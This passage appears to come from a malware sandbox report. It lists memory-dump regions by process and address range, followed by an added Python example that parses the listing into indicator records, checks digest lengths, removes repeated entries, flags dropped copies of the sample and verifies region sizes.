memory/1268-321-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/1268-249-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/1268-258-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/1268-241-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/1268-244-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/1268-240-0x0000000000000000-mapping.dmp
-
memory/1524-231-0x0000000000000000-mapping.dmp
-
memory/1620-423-0x00000000046D0000-0x0000000004810000-memory.dmp
Filesize 1.2MB
-
memory/1620-419-0x00000000046D0000-0x0000000004810000-memory.dmp
Filesize 1.2MB
-
memory/1620-415-0x0000000003A70000-0x00000000045C1000-memory.dmp
Filesize 11.3MB
-
memory/1620-420-0x00000000046D0000-0x0000000004810000-memory.dmp
Filesize 1.2MB
-
memory/1620-418-0x00000000046D0000-0x0000000004810000-memory.dmp
Filesize 1.2MB
-
memory/1620-421-0x00000000046D0000-0x0000000004810000-memory.dmp
Filesize 1.2MB
-
memory/1620-233-0x0000000000000000-mapping.dmp
-
memory/1620-422-0x00000000046D0000-0x0000000004810000-memory.dmp
Filesize 1.2MB
-
memory/1620-417-0x0000000003A70000-0x00000000045C1000-memory.dmp
Filesize 11.3MB
-
memory/1772-140-0x0000000000000000-mapping.dmp
-
memory/1976-229-0x0000000000000000-mapping.dmp
-
memory/2128-142-0x0000000000000000-mapping.dmp
-
memory/2220-386-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/2220-388-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/2220-387-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/2288-198-0x0000000000000000-mapping.dmp
-
memory/2332-199-0x0000000000000000-mapping.dmp
-
memory/2332-290-0x000000000E590000-0x000000000E9E3000-memory.dmp
Filesize 4.3MB
-
memory/2332-232-0x000000000E590000-0x000000000E9E3000-memory.dmp
Filesize 4.3MB
-
memory/2332-230-0x000000000E590000-0x000000000E9E3000-memory.dmp
Filesize 4.3MB
-
memory/2332-228-0x0000000002DB0000-0x0000000002F4C000-memory.dmp
Filesize 1.6MB
-
memory/2332-283-0x0000000002DB0000-0x0000000002F4C000-memory.dmp
Filesize 1.6MB
-
memory/2376-348-0x000000004ABD0000-0x000000004AC62000-memory.dmp
Filesize 584KB
-
memory/2376-269-0x0000000000000000-mapping.dmp
-
memory/2588-263-0x0000000000000000-mapping.dmp
-
memory/2656-325-0x0000000000000000-mapping.dmp
-
memory/2708-317-0x0000000000000000-mapping.dmp
-
memory/2708-324-0x00000000045A0000-0x00000000045D6000-memory.dmp
Filesize 216KB
-
memory/2708-333-0x0000000004C90000-0x0000000004CB2000-memory.dmp
Filesize 136KB
-
memory/2708-328-0x0000000004CF0000-0x0000000005318000-memory.dmp
Filesize 6.2MB
-
memory/2720-212-0x0000000000000000-mapping.dmp
-
memory/2908-190-0x0000000000000000-mapping.dmp
-
memory/2908-193-0x0000000000FA0000-0x0000000000FD2000-memory.dmp
Filesize 200KB
-
memory/2948-300-0x0000000000000000-mapping.dmp
-
memory/2948-309-0x000001E6AC770000-0x000001E6AC777000-memory.dmp
Filesize 28KB
-
memory/2948-310-0x00007FF433120000-0x00007FF43321A000-memory.dmp
Filesize 1000KB
-
memory/3020-250-0x0000000000000000-mapping.dmp
-
memory/3120-257-0x0000000140000000-0x000000014061A000-memory.dmp
Filesize 6.1MB
-
memory/3120-254-0x0000000000000000-mapping.dmp
-
memory/3168-177-0x0000000000000000-mapping.dmp
-
memory/3200-322-0x0000000000400000-0x000000000047D000-memory.dmp
Filesize 500KB
-
memory/3200-160-0x0000000000000000-mapping.dmp
-
memory/3200-174-0x00000000005B8000-0x00000000005E6000-memory.dmp
Filesize 184KB
-
memory/3200-320-0x00000000005B8000-0x00000000005E6000-memory.dmp
Filesize 184KB
-
memory/3200-173-0x0000000004C60000-0x0000000005204000-memory.dmp
Filesize 5.6MB
-
memory/3200-175-0x0000000002080000-0x00000000020CB000-memory.dmp
Filesize 300KB
-
memory/3200-176-0x0000000000400000-0x000000000047D000-memory.dmp
Filesize 500KB
-
memory/3200-246-0x00000000005B8000-0x00000000005E6000-memory.dmp
Filesize 184KB
-
memory/3232-167-0x0000000000000000-mapping.dmp
-
memory/3232-213-0x0000000007710000-0x0000000007C3C000-memory.dmp
Filesize 5.2MB
-
memory/3232-211-0x0000000007010000-0x00000000071D2000-memory.dmp
Filesize 1.8MB
-
memory/3232-216-0x0000000006EF0000-0x0000000006F66000-memory.dmp
Filesize 472KB
-
memory/3232-217-0x0000000006F70000-0x0000000006FC0000-memory.dmp
Filesize 320KB
-
memory/3264-183-0x0000000000000000-mapping.dmp
-
memory/3288-338-0x0000000000000000-mapping.dmp
-
memory/3328-219-0x0000000000000000-mapping.dmp
-
memory/3340-327-0x0000000000000000-mapping.dmp
-
memory/3348-151-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmp
Filesize 10.8MB
-
memory/3348-194-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmp
Filesize 10.8MB
-
memory/3348-373-0x0000000000000000-mapping.dmp
-
memory/3348-148-0x0000000000000000-mapping.dmp
-
memory/3376-180-0x0000000000000000-mapping.dmp
-
memory/3380-337-0x0000000000000000-mapping.dmp
-
memory/3456-279-0x0000000000000000-mapping.dmp
-
memory/3504-141-0x0000000000000000-mapping.dmp
-
memory/3724-438-0x0000015DF3480000-0x0000015DF34A0000-memory.dmp
Filesize 128KB
-
memory/3876-311-0x0000000000000000-mapping.dmp
-
memory/3948-425-0x0000019882A00000-0x0000019882B40000-memory.dmp
Filesize 1.2MB
-
memory/3948-424-0x0000019882A00000-0x0000019882B40000-memory.dmp
Filesize 1.2MB
-
memory/3952-236-0x0000000000751000-0x0000000000753000-memory.dmp
Filesize 8KB
-
memory/3952-222-0x0000000000000000-mapping.dmp
-
memory/3952-238-0x0000000002350000-0x0000000003350000-memory.dmp
Filesize 16.0MB
-
memory/3952-237-0x0000000000580000-0x000000000059D000-memory.dmp
Filesize 116KB
-
memory/3952-287-0x0000000000580000-0x000000000059D000-memory.dmp
Filesize 116KB
-
memory/4124-159-0x0000000004DC0000-0x0000000004DFC000-memory.dmp
Filesize 240KB
-
memory/4124-188-0x0000000005CC0000-0x0000000005D52000-memory.dmp
Filesize 584KB
-
memory/4124-152-0x0000000000000000-mapping.dmp
-
memory/4124-155-0x00000000003A0000-0x00000000003D2000-memory.dmp
Filesize 200KB
-
memory/4124-185-0x00000000050F0000-0x0000000005156000-memory.dmp
Filesize 408KB
-
memory/4124-156-0x00000000052B0000-0x00000000058C8000-memory.dmp
Filesize 6.1MB
-
memory/4124-157-0x0000000004E30000-0x0000000004F3A000-memory.dmp
Filesize 1.0MB
-
memory/4124-158-0x0000000004D60000-0x0000000004D72000-memory.dmp
Filesize 72KB
-
memory/4128-288-0x0000000000000000-mapping.dmp
-
memory/4148-187-0x0000000000000000-mapping.dmp
-
memory/4204-289-0x0000000000000000-mapping.dmp
-
memory/4320-186-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmp
Filesize 10.8MB
-
memory/4320-147-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmp
Filesize 10.8MB
-
memory/4320-146-0x0000000000E00000-0x0000000000E0A000-memory.dmp
Filesize 40KB
-
memory/4320-143-0x0000000000000000-mapping.dmp
-
memory/4408-243-0x0000000000000000-mapping.dmp
-
memory/4408-319-0x0000000002240000-0x000000000235B000-memory.dmp
Filesize 1.1MB
-
memory/4408-316-0x00000000020A2000-0x0000000002133000-memory.dmp
Filesize 580KB
-
memory/4428-294-0x0000000000000000-mapping.dmp
-
memory/4428-299-0x0000000000400000-0x0000000000558000-memory.dmp
Filesize 1.3MB
-
memory/4528-272-0x0000000000FB5000-0x0000000000FB7000-memory.dmp
Filesize 8KB
-
memory/4528-252-0x0000000000B60000-0x0000000000B95000-memory.dmp
Filesize 212KB
-
memory/4528-253-0x0000000000000000-mapping.dmp
-
memory/4528-278-0x0000000000F10000-0x0000000000F2D000-memory.dmp
Filesize 116KB
-
memory/4528-260-0x0000000000B60000-0x0000000000B95000-memory.dmp
Filesize 212KB
-
memory/4528-276-0x0000000000B60000-0x0000000000B95000-memory.dmp
Filesize 212KB
-
memory/4600-138-0x0000000000000000-mapping.dmp
-
memory/4636-137-0x0000000000000000-mapping.dmp
-
memory/4660-139-0x0000000000000000-mapping.dmp
-
memory/4740-210-0x0000000000630000-0x0000000000662000-memory.dmp
Filesize 200KB
-
memory/4740-206-0x0000000000000000-mapping.dmp
-
memory/4784-335-0x0000000000000000-mapping.dmp
-
memory/4824-197-0x0000000000000000-mapping.dmp
-
memory/4844-286-0x0000000000400000-0x000000000046F000-memory.dmp
Filesize 444KB
-
memory/4844-295-0x0000000000690000-0x00000000006AD000-memory.dmp
Filesize 116KB
-
memory/4844-225-0x0000000000000000-mapping.dmp
-
memory/4844-331-0x00000000006F8000-0x0000000000719000-memory.dmp
Filesize 132KB
-
memory/4844-330-0x000000000071D000-0x000000000072E000-memory.dmp
Filesize 68KB
-
memory/4844-329-0x0000000000400000-0x000000000046F000-memory.dmp
Filesize 444KB
-
memory/4844-284-0x00000000006F8000-0x0000000000719000-memory.dmp
Filesize 132KB
-
memory/4844-285-0x00000000004E0000-0x0000000000505000-memory.dmp
Filesize 148KB
-
memory/4844-292-0x000000000071D000-0x000000000072E000-memory.dmp
Filesize 68KB
-
memory/4844-332-0x0000000000690000-0x00000000006AD000-memory.dmp
Filesize 116KB
-
memory/4888-189-0x0000000000000000-mapping.dmp
-
memory/4964-135-0x0000000000000000-mapping.dmp
-
memory/4976-205-0x0000000000658000-0x0000000000687000-memory.dmp
Filesize 188KB
-
memory/4976-207-0x0000000000400000-0x000000000047D000-memory.dmp
Filesize 500KB
-
memory/4976-170-0x0000000000000000-mapping.dmp
-
memory/4976-273-0x0000000000658000-0x0000000000687000-memory.dmp
Filesize 188KB
-
memory/5004-307-0x0000000000000000-mapping.dmp
-
memory/5044-308-0x0000000000000000-mapping.dmp
-
memory/5052-184-0x0000000000000000-mapping.dmp
-
memory/5108-368-0x0000000000000000-mapping.dmp
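An analyst mining this report for indicators has to undo the rendering above: each dropped-file entry is a path, a size and four digests with the label fused to its value, each memory entry encodes the PID, snapshot index and address range in the dump name, entries are repeated verbatim, and one of them (5eb6b96734\nbveek.exe) carries the same digests as the submitted sample, so it is a dropped copy of the sample itself. The Python below is an added example, not tooling from the sandbox or from this page. It parses an excerpt copied from this report's listing, checks that every digest has the length its label implies, collapses the repeats, flags dropped files whose SHA256 equals the submitted sample's, and recomputes each memory region's size from its address range to confirm it agrees with the stated Filesize. The KB/MB rounding it compares against is inferred from the report's own figures and is an assumption.

```python
# Added example for this report page, not the sandbox's own tooling: parse the flattened
# dropped-file / memory listing into IOC records. REPORT_EXCERPT is copied from the page
# verbatim, with each label (Filesize, MD5, SHA1, ...) fused to its value as rendered.
import re
from typing import NamedTuple

REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Temp\1000125001\video.exeFilesize
416KB
MD5a1c8731309c7aafb9f47f50cf4288f59
SHA18d2d3baba8d735875f29d5ef64daa82d8b45fac9
SHA256870dc8112892c35a362f0fcbd5e4bfc3a85b8a818e27a8e1b1d411d71f48a16b
SHA5120a0e4a501324e0ac363f003513c829379b9cfbf040ad27ad6250a562aace9f582fbcd1c7140f644571a89f9292c56d61278a50829a1f764c5b3dba14a7570c01
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exeFilesize
235KB
MD567bb41448f41511e169c83230d7e9486
SHA1dde5a6577a966a9e8713e66ad7ef50b840dd114e
SHA256f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914da4e04aee13df10007b
SHA51284baf5659cee4e55f48ea0523e2f30c5c6d696d5881da7f628cb4450f1dfc949396ee48cbded60dc98b53483aeb5cdf7fbe4970ab612049356185f2aadf02d84
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exeFilesize
235KB
MD567bb41448f41511e169c83230d7e9486
SHA1dde5a6577a966a9e8713e66ad7ef50b840dd114e
SHA256f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914da4e04aee13df10007b
SHA51284baf5659cee4e55f48ea0523e2f30c5c6d696d5881da7f628cb4450f1dfc949396ee48cbded60dc98b53483aeb5cdf7fbe4970ab612049356185f2aadf02d84
-
memory/260-218-0x00007FFD3D0E0000-0x00007FFD3DBA1000-memory.dmpFilesize
10.8MB
-
memory/432-277-0x0000000000400000-0x000000000047D000-memory.dmpFilesize
500KB
-
"""

SAMPLE_SHA256 = "f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914da4e04aee13df10007b"  # report header
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(SHA512|SHA256|SHA1|MD5)([0-9a-fA-F]+)$")  # longest label first
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]{16})-0x([0-9A-Fa-f]{16})-memory\.dmp$")


class DroppedFile(NamedTuple):
    path: str
    size: str
    hashes: dict


class MemoryRegion(NamedTuple):
    pid: int
    index: int
    start: int
    end: int
    size_label: str


def parse_listing(text):
    """Split the fused listing into DroppedFile and MemoryRegion records."""
    files, regions = [], []
    lines = [ln.strip() for ln in text.splitlines()]
    i = 0
    while i < len(lines):
        if not lines[i].endswith("Filesize"):
            i += 1  # "-" separators, blank lines and mapping.dmp entries carry nothing to extract
            continue
        name, size = lines[i][: -len("Filesize")], lines[i + 1]
        i += 2
        if m := MEM_RE.match(name):
            pid, idx, start, end = m.groups()
            regions.append(MemoryRegion(int(pid), int(idx), int(start, 16), int(end, 16), size))
            continue
        hashes = {}
        while i < len(lines) and (hm := HASH_RE.match(lines[i])):
            label, digest = hm.group(1), hm.group(2).lower()
            if len(digest) != HASH_LEN[label]:  # a mis-split or truncated digest must not become an IOC
                raise ValueError(f"{label} for {name}: {len(digest)} hex chars, expected {HASH_LEN[label]}")
            hashes[label] = digest
            i += 1
        files.append(DroppedFile(name, size, hashes))
    return files, regions


def unique_files(files):
    """Collapse the verbatim repeats in the listing (same path and SHA256)."""
    seen, out = set(), []
    for f in files:
        key = (f.path, f.hashes.get("SHA256"))
        if key not in seen:
            seen.add(key)
            out.append(f)
    return out


def self_copies(files, sample_sha256=SAMPLE_SHA256):
    """Paths of dropped files that are byte-identical to the submitted sample."""
    return [f.path for f in unique_files(files) if f.hashes.get("SHA256") == sample_sha256]


def human_size(n):
    """Size label in the report's convention (inferred: KiB below 1 MiB, else MiB to one decimal)."""
    return f"{n // 1024}KB" if n < 1024 * 1024 else f"{n / (1024 * 1024):.1f}MB"


def region_size_mismatches(regions):
    """Regions whose stated Filesize disagrees with the size implied by the address range."""
    return [r for r in regions if human_size(r.end - r.start) != r.size_label]
```

parse_listing takes the raw listing text, so running it over the full report instead of the excerpt is only a matter of feeding it a larger string. A digest of the wrong length raises instead of being emitted, because a truncated hash in an IOC feed is worse than none, and the range check on memory regions is a cheap way to notice a copy-and-paste error in a dump name before it is used to pick a dump for unpacking.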